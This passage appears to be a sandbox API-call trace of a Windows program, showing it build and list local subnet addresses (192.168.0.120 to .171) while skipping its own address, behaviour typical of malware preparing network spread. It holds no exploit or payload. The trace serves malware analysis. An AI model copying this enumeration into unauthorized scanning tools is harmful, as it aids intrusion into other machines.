ListEntry=0x3981528) returned 0x3981500 [0095.957] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.120") returned 13 [0095.957] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.120") returned 1 [0095.957] malloc (_Size=0x1c) returned 0x3981550 [0095.957] lstrcpyA (in: lpString1=0x3981554, lpString2="192.168.0.120" | out: lpString1="192.168.0.120") returned="192.168.0.120" [0095.957] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981550 | out: ListHead=0x2064bd0, ListEntry=0x3981550) returned 0x3981528 [0095.957] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.121") returned 13 [0095.957] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.121") returned 1 [0095.957] malloc (_Size=0x1c) returned 0x3981578 [0095.957] lstrcpyA (in: lpString1=0x398157c, lpString2="192.168.0.121" | out: lpString1="192.168.0.121") returned="192.168.0.121" [0095.957] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981578 | out: ListHead=0x2064bd0, ListEntry=0x3981578) returned 0x3981550 [0095.957] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.122") returned 13 [0095.957] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.122") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x39815a0 [0095.958] lstrcpyA (in: lpString1=0x39815a4, lpString2="192.168.0.122" | out: lpString1="192.168.0.122") returned="192.168.0.122" [0095.958] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39815a0 | out: ListHead=0x2064bd0, ListEntry=0x39815a0) returned 0x3981578 [0095.958] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.123") returned 13 [0095.958] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.123") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x39815c8 [0095.958] lstrcpyA (in: lpString1=0x39815cc, lpString2="192.168.0.123" | out: lpString1="192.168.0.123") returned="192.168.0.123" [0095.958] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39815c8 | out: ListHead=0x2064bd0, ListEntry=0x39815c8) returned 0x39815a0 [0095.958] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.124") returned 13 [0095.958] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.124") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x39815f0 [0095.958] lstrcpyA (in: lpString1=0x39815f4, lpString2="192.168.0.124" | out: lpString1="192.168.0.124") returned="192.168.0.124" [0095.958] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39815f0 | out: ListHead=0x2064bd0, ListEntry=0x39815f0) returned 0x39815c8 [0095.958] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.125") returned 13 [0095.958] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.125") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x3981618 [0095.958] lstrcpyA (in: lpString1=0x398161c, lpString2="192.168.0.125" | out: lpString1="192.168.0.125") returned="192.168.0.125" [0095.958] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981618 | out: ListHead=0x2064bd0, ListEntry=0x3981618) returned 0x39815f0 [0095.958] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.126") returned 13 [0095.958] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.126") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x3981640 [0095.958] lstrcpyA (in: lpString1=0x3981644, lpString2="192.168.0.126" | out: lpString1="192.168.0.126") returned="192.168.0.126" [0095.958] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981640 | out: ListHead=0x2064bd0, ListEntry=0x3981640) returned 0x3981618 [0095.958] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.127") returned 13 [0095.958] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.127") returned 1 [0095.958] malloc (_Size=0x1c) returned 0x3981668 [0095.958] lstrcpyA (in: lpString1=0x398166c, lpString2="192.168.0.127" | out: lpString1="192.168.0.127") returned="192.168.0.127" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981668 | out: ListHead=0x2064bd0, ListEntry=0x3981668) returned 0x3981640 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.128") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.128") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x3981690 [0095.959] lstrcpyA (in: lpString1=0x3981694, lpString2="192.168.0.128" | out: lpString1="192.168.0.128") returned="192.168.0.128" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981690 | out: ListHead=0x2064bd0, ListEntry=0x3981690) returned 0x3981668 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.129") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.129") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x39816b8 [0095.959] lstrcpyA (in: lpString1=0x39816bc, lpString2="192.168.0.129" | out: lpString1="192.168.0.129") returned="192.168.0.129" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39816b8 | out: ListHead=0x2064bd0, ListEntry=0x39816b8) returned 0x3981690 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.130") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.130") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x39816e0 [0095.959] lstrcpyA (in: lpString1=0x39816e4, lpString2="192.168.0.130" | out: lpString1="192.168.0.130") returned="192.168.0.130" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39816e0 | out: ListHead=0x2064bd0, ListEntry=0x39816e0) returned 0x39816b8 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.131") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.131") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x3981708 [0095.959] lstrcpyA (in: lpString1=0x398170c, lpString2="192.168.0.131" | out: lpString1="192.168.0.131") returned="192.168.0.131" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981708 | out: ListHead=0x2064bd0, ListEntry=0x3981708) returned 0x39816e0 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.132") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.132") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x3981730 [0095.959] lstrcpyA (in: lpString1=0x3981734, lpString2="192.168.0.132" | out: lpString1="192.168.0.132") returned="192.168.0.132" [0095.959] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981730 | out: ListHead=0x2064bd0, ListEntry=0x3981730) returned 0x3981708 [0095.959] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.133") returned 13 [0095.959] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.133") returned 1 [0095.959] malloc (_Size=0x1c) returned 0x3981758 [0095.959] lstrcpyA (in: lpString1=0x398175c, lpString2="192.168.0.133" | out: lpString1="192.168.0.133") returned="192.168.0.133" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981758 | out: ListHead=0x2064bd0, ListEntry=0x3981758) returned 0x3981730 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.134") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.134") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x3981780 [0095.960] lstrcpyA (in: lpString1=0x3981784, lpString2="192.168.0.134" | out: lpString1="192.168.0.134") returned="192.168.0.134" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981780 | out: ListHead=0x2064bd0, ListEntry=0x3981780) returned 0x3981758 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.135") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.135") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x39817a8 [0095.960] lstrcpyA (in: lpString1=0x39817ac, lpString2="192.168.0.135" | out: lpString1="192.168.0.135") returned="192.168.0.135" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39817a8 | out: ListHead=0x2064bd0, ListEntry=0x39817a8) returned 0x3981780 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.136") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.136") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x39817d0 [0095.960] lstrcpyA (in: lpString1=0x39817d4, lpString2="192.168.0.136" | out: lpString1="192.168.0.136") returned="192.168.0.136" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39817d0 | out: ListHead=0x2064bd0, ListEntry=0x39817d0) returned 0x39817a8 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.137") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.137") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x39817f8 [0095.960] lstrcpyA (in: lpString1=0x39817fc, lpString2="192.168.0.137" | out: lpString1="192.168.0.137") returned="192.168.0.137" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39817f8 | out: ListHead=0x2064bd0, ListEntry=0x39817f8) returned 0x39817d0 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.138") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.138") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x3981820 [0095.960] lstrcpyA (in: lpString1=0x3981824, lpString2="192.168.0.138" | out: lpString1="192.168.0.138") returned="192.168.0.138" [0095.960] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981820 | out: ListHead=0x2064bd0, ListEntry=0x3981820) returned 0x39817f8 [0095.960] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.139") returned 13 [0095.960] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.139") returned 1 [0095.960] malloc (_Size=0x1c) returned 0x3981848 [0095.961] lstrcpyA (in: lpString1=0x398184c, lpString2="192.168.0.139" | out: lpString1="192.168.0.139") returned="192.168.0.139" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981848 | out: ListHead=0x2064bd0, ListEntry=0x3981848) returned 0x3981820 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.140") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.140") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x3981870 [0095.961] lstrcpyA (in: lpString1=0x3981874, lpString2="192.168.0.140" | out: lpString1="192.168.0.140") returned="192.168.0.140" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981870 | out: ListHead=0x2064bd0, ListEntry=0x3981870) returned 0x3981848 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.141") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.141") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x3981898 [0095.961] lstrcpyA (in: lpString1=0x398189c, lpString2="192.168.0.141" | out: lpString1="192.168.0.141") returned="192.168.0.141" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981898 | out: ListHead=0x2064bd0, ListEntry=0x3981898) returned 0x3981870 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.142") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.142") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x39818c0 [0095.961] lstrcpyA (in: lpString1=0x39818c4, lpString2="192.168.0.142" | out: lpString1="192.168.0.142") returned="192.168.0.142" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39818c0 | out: ListHead=0x2064bd0, ListEntry=0x39818c0) returned 0x3981898 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.143") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.143") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x39818e8 [0095.961] lstrcpyA (in: lpString1=0x39818ec, lpString2="192.168.0.143" | out: lpString1="192.168.0.143") returned="192.168.0.143" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39818e8 | out: ListHead=0x2064bd0, ListEntry=0x39818e8) returned 0x39818c0 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.144") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.144") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x3981910 [0095.961] lstrcpyA (in: lpString1=0x3981914, lpString2="192.168.0.144" | out: lpString1="192.168.0.144") returned="192.168.0.144" [0095.961] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981910 | out: ListHead=0x2064bd0, ListEntry=0x3981910) returned 0x39818e8 [0095.961] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.145") returned 13 [0095.961] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.145") returned 1 [0095.961] malloc (_Size=0x1c) returned 0x3981938 [0095.962] lstrcpyA (in: lpString1=0x398193c, lpString2="192.168.0.145" | out: lpString1="192.168.0.145") returned="192.168.0.145" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981938 | out: ListHead=0x2064bd0, ListEntry=0x3981938) returned 0x3981910 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.146") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.146") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x3981960 [0095.962] lstrcpyA (in: lpString1=0x3981964, lpString2="192.168.0.146" | out: lpString1="192.168.0.146") returned="192.168.0.146" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981960 | out: ListHead=0x2064bd0, ListEntry=0x3981960) returned 0x3981938 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.147") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.147") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x3981988 [0095.962] lstrcpyA (in: lpString1=0x398198c, lpString2="192.168.0.147" | out: lpString1="192.168.0.147") returned="192.168.0.147" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981988 | out: ListHead=0x2064bd0, ListEntry=0x3981988) returned 0x3981960 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.148") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.148") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x39819b0 [0095.962] lstrcpyA (in: lpString1=0x39819b4, lpString2="192.168.0.148" | out: lpString1="192.168.0.148") returned="192.168.0.148" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39819b0 | out: ListHead=0x2064bd0, ListEntry=0x39819b0) returned 0x3981988 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.149") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.149") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x39819d8 [0095.962] lstrcpyA (in: lpString1=0x39819dc, lpString2="192.168.0.149" | out: lpString1="192.168.0.149") returned="192.168.0.149" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39819d8 | out: ListHead=0x2064bd0, ListEntry=0x39819d8) returned 0x39819b0 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.150") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.150") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x3981a00 [0095.962] lstrcpyA (in: lpString1=0x3981a04, lpString2="192.168.0.150" | out: lpString1="192.168.0.150") returned="192.168.0.150" [0095.962] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981a00 | out: ListHead=0x2064bd0, ListEntry=0x3981a00) returned 0x39819d8 [0095.962] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.151") returned 13 [0095.962] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.151") returned 1 [0095.962] malloc (_Size=0x1c) returned 0x3981a28 [0095.962] lstrcpyA (in: lpString1=0x3981a2c, lpString2="192.168.0.151" | out: lpString1="192.168.0.151") returned="192.168.0.151" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981a28 | out: ListHead=0x2064bd0, ListEntry=0x3981a28) returned 0x3981a00 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.152") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.152") returned 1 [0095.963] malloc (_Size=0x1c) returned 0x3981a50 [0095.963] lstrcpyA (in: lpString1=0x3981a54, lpString2="192.168.0.152" | out: lpString1="192.168.0.152") returned="192.168.0.152" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981a50 | out: ListHead=0x2064bd0, ListEntry=0x3981a50) returned 0x3981a28 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.153") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.153") returned 1 [0095.963] malloc (_Size=0x1c) returned 0x3981a78 [0095.963] lstrcpyA (in: lpString1=0x3981a7c, lpString2="192.168.0.153" | out: lpString1="192.168.0.153") returned="192.168.0.153" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981a78 | out: ListHead=0x2064bd0, ListEntry=0x3981a78) returned 0x3981a50 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.154") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.154") returned 1 [0095.963] malloc (_Size=0x1c) returned 0x3981aa0 [0095.963] lstrcpyA (in: lpString1=0x3981aa4, lpString2="192.168.0.154" | out: lpString1="192.168.0.154") returned="192.168.0.154" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981aa0 | out: ListHead=0x2064bd0, ListEntry=0x3981aa0) returned 0x3981a78 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.155") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.155") returned 1 [0095.963] malloc (_Size=0x1c) returned 0x3981ac8 [0095.963] lstrcpyA (in: lpString1=0x3981acc, lpString2="192.168.0.155" | out: lpString1="192.168.0.155") returned="192.168.0.155" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981ac8 | out: ListHead=0x2064bd0, ListEntry=0x3981ac8) returned 0x3981aa0 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.156") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.156") returned 1 [0095.963] malloc (_Size=0x1c) returned 0x3981af0 [0095.963] lstrcpyA (in: lpString1=0x3981af4, lpString2="192.168.0.156" | out: lpString1="192.168.0.156") returned="192.168.0.156" [0095.963] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981af0 | out: ListHead=0x2064bd0, ListEntry=0x3981af0) returned 0x3981ac8 [0095.963] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.157") returned 13 [0095.963] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.157") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981b18 [0095.964] lstrcpyA (in: lpString1=0x3981b1c, lpString2="192.168.0.157" | out: lpString1="192.168.0.157") returned="192.168.0.157" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981b18 | out: ListHead=0x2064bd0, ListEntry=0x3981b18) returned 0x3981af0 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.158") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.158") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981b40 [0095.964] lstrcpyA (in: lpString1=0x3981b44, lpString2="192.168.0.158" | out: lpString1="192.168.0.158") returned="192.168.0.158" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981b40 | out: ListHead=0x2064bd0, ListEntry=0x3981b40) returned 0x3981b18 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.159") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.159") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981b68 [0095.964] lstrcpyA (in: lpString1=0x3981b6c, lpString2="192.168.0.159" | out: lpString1="192.168.0.159") returned="192.168.0.159" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981b68 | out: ListHead=0x2064bd0, ListEntry=0x3981b68) returned 0x3981b40 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.160") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.160") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981b90 [0095.964] lstrcpyA (in: lpString1=0x3981b94, lpString2="192.168.0.160" | out: lpString1="192.168.0.160") returned="192.168.0.160" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981b90 | out: ListHead=0x2064bd0, ListEntry=0x3981b90) returned 0x3981b68 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.161") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.161") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981bb8 [0095.964] lstrcpyA (in: lpString1=0x3981bbc, lpString2="192.168.0.161" | out: lpString1="192.168.0.161") returned="192.168.0.161" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981bb8 | out: ListHead=0x2064bd0, ListEntry=0x3981bb8) returned 0x3981b90 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.162") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.162") returned 1 [0095.964] malloc (_Size=0x1c) returned 0x3981be0 [0095.964] lstrcpyA (in: lpString1=0x3981be4, lpString2="192.168.0.162" | out: lpString1="192.168.0.162") returned="192.168.0.162" [0095.964] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981be0 | out: ListHead=0x2064bd0, ListEntry=0x3981be0) returned 0x3981bb8 [0095.964] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.163") returned 13 [0095.964] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.163") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x3981c08 [0095.965] lstrcpyA (in: lpString1=0x3981c0c, lpString2="192.168.0.163" | out: lpString1="192.168.0.163") returned="192.168.0.163" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981c08 | out: ListHead=0x2064bd0, ListEntry=0x3981c08) returned 0x3981be0 [0095.965] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.164") returned 13 [0095.965] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.164") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x3981c30 [0095.965] lstrcpyA (in: lpString1=0x3981c34, lpString2="192.168.0.164" | out: lpString1="192.168.0.164") returned="192.168.0.164" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981c30 | out: ListHead=0x2064bd0, ListEntry=0x3981c30) returned 0x3981c08 [0095.965] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.165") returned 13 [0095.965] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.165") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x3981c58 [0095.965] lstrcpyA (in: lpString1=0x3981c5c, lpString2="192.168.0.165" | out: lpString1="192.168.0.165") returned="192.168.0.165" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981c58 | out: ListHead=0x2064bd0, ListEntry=0x3981c58) returned 0x3981c30 [0095.965] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.166") returned 13 [0095.965] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.166") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x3981c80 [0095.965] lstrcpyA (in: lpString1=0x3981c84, lpString2="192.168.0.166" | out: lpString1="192.168.0.166") returned="192.168.0.166" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981c80 | out: ListHead=0x2064bd0, ListEntry=0x3981c80) returned 0x3981c58 [0095.965] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.167") returned 13 [0095.965] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.167") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x20abaf8 [0095.965] lstrcpyA (in: lpString1=0x20abafc, lpString2="192.168.0.167" | out: lpString1="192.168.0.167") returned="192.168.0.167" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abaf8 | out: ListHead=0x2064bd0, ListEntry=0x20abaf8) returned 0x3981c80 [0095.965] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.168") returned 13 [0095.965] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.168") returned 1 [0095.965] malloc (_Size=0x1c) returned 0x20abb20 [0095.965] lstrcpyA (in: lpString1=0x20abb24, lpString2="192.168.0.168" | out: lpString1="192.168.0.168") returned="192.168.0.168" [0095.965] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abb20 | out: ListHead=0x2064bd0, ListEntry=0x20abb20) returned 0x20abaf8 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.169") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.169") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abb48 [0095.966] lstrcpyA (in: lpString1=0x20abb4c, lpString2="192.168.0.169" | out: lpString1="192.168.0.169") returned="192.168.0.169" [0095.966] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abb48 | out: ListHead=0x2064bd0, ListEntry=0x20abb48) returned 0x20abb20 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.170") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.170") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abb70 [0095.966] lstrcpyA (in: lpString1=0x20abb74, lpString2="192.168.0.170" | out: lpString1="192.168.0.170") returned="192.168.0.170" [0095.966] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abb70 | out: ListHead=0x2064bd0, ListEntry=0x20abb70) returned 0x20abb48 [0095.966] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.171") returned 13 [0095.966] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.171") returned 1 [0095.966] malloc (_Size=0x1c) returned 0x20abb98 [0095.966] lstrcpyA (in: lpString1=0x20abb9c, lpString2="192.168.0.171" | out: lpString1="192.168.0.171") returned="192.168.0.171" [0095.966] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20abb98 | 